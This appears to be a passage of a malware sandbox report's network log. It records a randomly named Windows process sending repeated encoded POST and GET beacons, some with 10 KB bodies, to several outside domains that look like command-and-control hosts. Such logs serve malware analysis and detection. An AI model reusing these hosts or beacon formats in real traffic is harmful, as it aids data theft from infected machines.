                                                                                                                    Data Ascii: AHkx=h/ionbQWjbvi0Uwiv89uhlMEtXOuYNvRBKmGLSEnNHvG+ax6QYvrT236BxeC3RmdeqBu2SDWNpepN+uFuQEzcBOxuHnY0WDQwzw9DIafsl6sFlMjBHmQawAC7mf9K8Aim8kPwxnZyBWLM0OEQX8xQe+/SyBMjiUtBZr9MnFRoyZN4PSOIgwOPNPTSf3vmwgedw==
                                                                                                                    Oct 9, 2024 14:20:58.129436016 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:57 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    26 | 192.168.2.4 | 49645 | 154.212.219.2 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:59.772252083 CEST | 748 | OUT | POST /6wpo/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Origin: http://www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83Ky3G/6h6RaLrQ236KReD4xmDer8b2QXWNqipN82FvnYwdRO/innapGDQwzw9DIO5slSsFQEjAiKXGAAB+mf9O8Acm8lYw0O8yCuLM2GETG8yLO+1PiAoriZJDpu8ElZ92AhM5JDUZRRZdNrgPY+brzdXG6UQyn8IS3qbH6XEt229QXA=
                                                                                                                    Oct 9, 2024 14:21:00.661510944 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:00 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    27 | 192.168.2.4 | 49646 | 154.212.219.2 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:02.316055059 CEST | 10830 | OUT | POST /6wpo/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Origin: http://www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:21:03.191891909 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    28 | 192.168.2.4 | 49647 | 154.212.219.2 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:04.859318018 CEST | 465 | OUT | GET /6wpo/?AHkx=s9KIkrkzrqTbzkMmh7Bli3B0wEyBHaCwBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAcV+6tVbS2gqGz3F/PYSng2mbFSIjOzq2Kmk=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:21:05.895066977 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    29 | 192.168.2.4 | 49648 | 133.130.35.90 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:12.227118969 CEST | 716 | OUT | POST /p9u3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.komart.shop
                                                                                                                    Origin: http://www.komart.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.komart.shop/p9u3/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=O3h880Jaoet1EdJJRgtptXVsNjIr6bOg8M98GcuIhSzoOTKJIPkj06RmlF3TeaqbQBMmWVilkpx1UyMlcKFS/ewYqhjVAxnP8Bq+QiSxB9GsEVKgYV8v1K3UZPSTUWtc05qCRJtBA8gx5HJpN01AxweVCRu5jSKfkzkBW+fa87Vxcc2yrqfQW9TKbEnfAoXXQg==
                                                                                                                    Oct 9, 2024 14:21:13.023412943 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                                                    content-encoding: gzip
                                                                                                                    content-type: text/html
                                                                                                                    date: Wed, 09 Oct 2024 12:21:12 GMT
                                                                                                                    etag: W/"66fe0220-2b5"
                                                                                                                    server: nginx
                                                                                                                    vary: Accept-Encoding
                                                                                                                    content-length: 454
                                                                                                                    connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    30 | 192.168.2.4 | 49649 | 133.130.35.90 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:14.768416882 CEST | 736 | OUT | POST /p9u3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.komart.shop
                                                                                                                    Origin: http://www.komart.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.komart.shop/p9u3/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkLoARiJP6Ij36Rmtl3WT6qAQBwuWXmlkpl1Uy8lcZtN+OwglBjTORnP8Bq+Qm6LB5SsEl6ge3Uor63XQvSTQWtY05rXRIhrA+ox5H5pNgpD4wefchvOkj/N9zNNbfHu3LJmU6no6b+HE935GDurNrqeLjo/bHatAoAZENyLG297vr4=
                                                                                                                    Oct 9, 2024 14:21:15.543420076 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                                                    content-encoding: gzip
                                                                                                                    content-type: text/html
                                                                                                                    date: Wed, 09 Oct 2024 12:21:15 GMT
                                                                                                                    etag: W/"66fe0220-2b5"
                                                                                                                    server: nginx
                                                                                                                    vary: Accept-Encoding
                                                                                                                    content-length: 454
                                                                                                                    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49650 | 133.130.35.90 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:17.319358110 CEST | 10818 | OUT | POST /p9u3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.komart.shop
Origin: http://www.komart.shop
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10301
Referer: http://www.komart.shop/p9u3/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:21:18.270903111 CEST | 668 | IN | HTTP/1.1 404 Not Found
content-encoding: gzip
content-type: text/html
date: Wed, 09 Oct 2024 12:21:18 GMT
etag: W/"66fe0220-2b5"
server: nginx
vary: Accept-Encoding
content-length: 454
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49651 | 133.130.35.90 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:19.862317085 CEST | 461 | OUT | GET /p9u3/?AHkx=D1Jc/C1nh+BZL85ZeChw3l4+cioj8fKXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1Ewp0jkjvaZxrb1x+aTR+tBdOAHUHhfEgGmf4=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.komart.shop
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:21:20.647305965 CEST | 883 | IN | HTTP/1.1 404 Not Found
content-type: text/html
date: Wed, 09 Oct 2024 12:21:20 GMT
etag: W/"66fe0220-2b5"
server: nginx
vary: Accept-Encoding
content-length: 693
connection: close
Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49652 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:25.880536079 CEST | 746 | OUT | POST /u6k6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.healthyloveforall.net
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
Referer: http://www.healthyloveforall.net/u6k6/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Ascii: AHkx=QaRrc21L6/AMcpA6cPVJElePiojv5/HeR4Rk7f64hCVQOIvv5WqNk2J+WQQR/By+k6a/354RDgXE2Ro10PL5YAd364gXPrS/Qq/D500TW+N1Qyv67pDsH+nkzw8Z4XThi1T63r96UNKRppFiIEgnab+qJu8MhAPFqNqNDYFhpnylUe8K5p8+cledw66PziMD6A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49653 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:29.395062923 CEST | 766 | OUT | POST /u6k6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.healthyloveforall.net
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 221
Referer: http://www.healthyloveforall.net/u6k6/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Ascii: AHkx=QaRrc21L6/AMeJw6aeVJFFeOnojvwfHSR4Vk7aD9iwhQOqHv4S+Nl2J+OAQUxhy5k6WG34oRDgDE2UU108j6eQd11YgVSbS/Qq/D50w5W+V1TCf689XtYOnn0w8Zz3Tli1Tc3qgVUIORptBiIQ8kTb+sF+9ZgDrKron7DLgG02aCRYtQoYdpOl6ut9z7+hxKhHXr5ANs2qBJgkjMneaLGZ0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49654 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:31.946639061 CEST | 10848 | OUT | POST /u6k6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.healthyloveforall.net
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10301
Referer: http://www.healthyloveforall.net/u6k6/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49655 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:34.485801935 CEST | 471 | OUT | GET /u6k6/?AHkx=dY5LfBxT8+4OTYgUENZhMVKOyd75/pKzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryWU5ty+AJNLXNUa+K51k8edVyQTCKjNaYJ5Y=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.healthyloveforall.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:21:34.967421055 CEST | 400 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 09 Oct 2024 12:21:34 GMT
Content-Type: text/html
Content-Length: 260
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AHkx=dY5LfBxT8+4OTYgUENZhMVKOyd75/pKzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryWU5ty+AJNLXNUa+K51k8edVyQTCKjNaYJ5Y=&rf-LZ=JlCtuN3HqPO8C"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49656 | 172.191.244.62 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:40.523505926 CEST | 725 | OUT | POST /jqkr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.lurknlarkk.xyz
Origin: http://www.lurknlarkk.xyz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
Referer: http://www.lurknlarkk.xyz/jqkr/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Ascii: AHkx=u/VSG/tzp2C4KQoKd/yxsblZyUa0VUIIyMjSBruwUvhgaJW9abiBzu9E3EVW5oBns0R/CqmwdIZX/5O6JBzH5/sE90wJsGeFo8W4KclfyuF2+FGpZY7mfYBndt4+RIHxkPxPHuH2hZ5SYkS7EcSKGLhCvur4SwJ3i9v6r0CWvfBKowvYAA/bhNT2MkjioDsHlA==
Oct 9, 2024 14:21:40.994254112 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Wed, 09 Oct 2024 12:21:40 GMT
Content-Length: 19
Connection: close
                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                    Data Ascii: 404 page not found


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    38 | 192.168.2.4 | 49657 | 172.191.244.62 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:43.244692087 CEST | 745 | OUT | POST /jqkr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.lurknlarkk.xyz
                                                                                                                    Origin: http://www.lurknlarkk.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4d 78 34 4b 62 63 61 78 6b 62 6c 57 75 6b 61 30 62 30 49 45 79 4d 76 53 42 75 4f 67 55 64 31 67 61 6f 6d 39 62 61 69 42 77 75 39 45 2f 6b 56 54 30 49 42 73 73 30 4e 33 43 6f 79 77 64 49 39 58 2f 38 71 36 4b 79 62 47 2f 76 73 47 32 55 77 4c 68 6d 65 46 6f 38 57 34 4b 63 67 45 79 75 74 32 2b 30 57 70 5a 39 58 6e 56 34 42 6d 55 4e 34 2b 56 49 48 31 6b 50 78 78 48 71 66 4d 68 66 31 53 59 68 75 37 45 49 47 4e 50 4c 68 49 72 75 71 50 63 54 74 7a 6b 75 71 72 68 6c 32 69 6b 2b 64 61 70 32 2b 43 52 78 65 4d 7a 4e 33 46 52 6a 71 57 6c 41 52 4f 2b 4e 4e 36 4d 73 65 61 4e 42 78 68 67 41 45 6a 58 68 33 49 32 6d 34 3d
                                                                                                                    Data Ascii: AHkx=u/VSG/tzp2C4Mx4KbcaxkblWuka0b0IEyMvSBuOgUd1gaom9baiBwu9E/kVT0IBss0N3CoywdI9X/8q6KybG/vsG2UwLhmeFo8W4KcgEyut2+0WpZ9XnV4BmUN4+VIH1kPxxHqfMhf1SYhu7EIGNPLhIruqPcTtzkuqrhl2ik+dap2+CRxeMzN3FRjqWlARO+NN6MseaNBxhgAEjXh3I2m4=
                                                                                                                    Oct 9, 2024 14:21:43.768826962 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:43 GMT
                                                                                                                    Content-Length: 19
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                    Data Ascii: 404 page not found


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    39 | 192.168.2.4 | 49658 | 172.191.244.62 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:45.783410072 CEST | 10827 | OUT | POST /jqkr/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.lurknlarkk.xyz
                                                                                                                    Origin: http://www.lurknlarkk.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    40 | 192.168.2.4 | 49659 | 172.191.244.62 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:48.327440977 CEST | 464 | OUT | GET /jqkr/?AHkx=j99yFPFWu1ukFCAnSMaPoqYJsGaKTyAIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu+KoA1mYPwgzWoJCMPt1Uicxvw1jTfpaTUc0=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.lurknlarkk.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:21:48.798146963 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:48 GMT
                                                                                                                    Content-Length: 19
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                    Data Ascii: 404 page not found


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    41 | 192.168.2.4 | 49660 | 162.241.244.106 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:53.970863104 CEST | 725 | OUT | POST /hya5/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.mommymode.site
                                                                                                                    Origin: http://www.mommymode.site
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.mommymode.site/hya5/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 48 43 32 6a 65 59 30 52 44 5a 59 42 6f 2b 64 36 4b 53 30 72 43 58 77 45 30 75 6a 59 50 6b 72 4c 54 70 47 73 5a 4e 30 72 33 5a 31 4f 68 4a 75 6a 4a 35 62 44 2b 73 32 2f 43 65 64 68 55 48 6b 6f 59 58 56 32 71 44 33 64 62 6e 69 42 5a 6c 36 65 53 49 59 61 51 65 62 77 70 66 36 61 78 74 64 6b 5a 7a 2b 31 68 75 34 74 71 73 55 65 77 52 62 4e 39 34 4d 31 45 39 2b 58 50 61 67 6a 5a 51 6c 55 71 77 32 53 76 38 78 39 53 47 6a 52 70 66 7a 38 39 35 45 51 35 35 57 38 41 2b 4c 71 72 66 4a 67 78 66 30 45 63 78 6e 39 4c 67 4d 73 72 78 43 58 2b 36 72 34 47 77 3d 3d
                                                                                                                    Data Ascii: AHkx=pDgGeDs8Yl7nHC2jeY0RDZYBo+d6KS0rCXwE0ujYPkrLTpGsZN0r3Z1OhJujJ5bD+s2/CedhUHkoYXV2qD3dbniBZl6eSIYaQebwpf6axtdkZz+1hu4tqsUewRbN94M1E9+XPagjZQlUqw2Sv8x9SGjRpfz895EQ55W8A+LqrfJgxf0Ecxn9LgMsrxCX+6r4Gw==
                                                                                                                    Oct 9, 2024 14:21:54.748464108 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:54 GMT
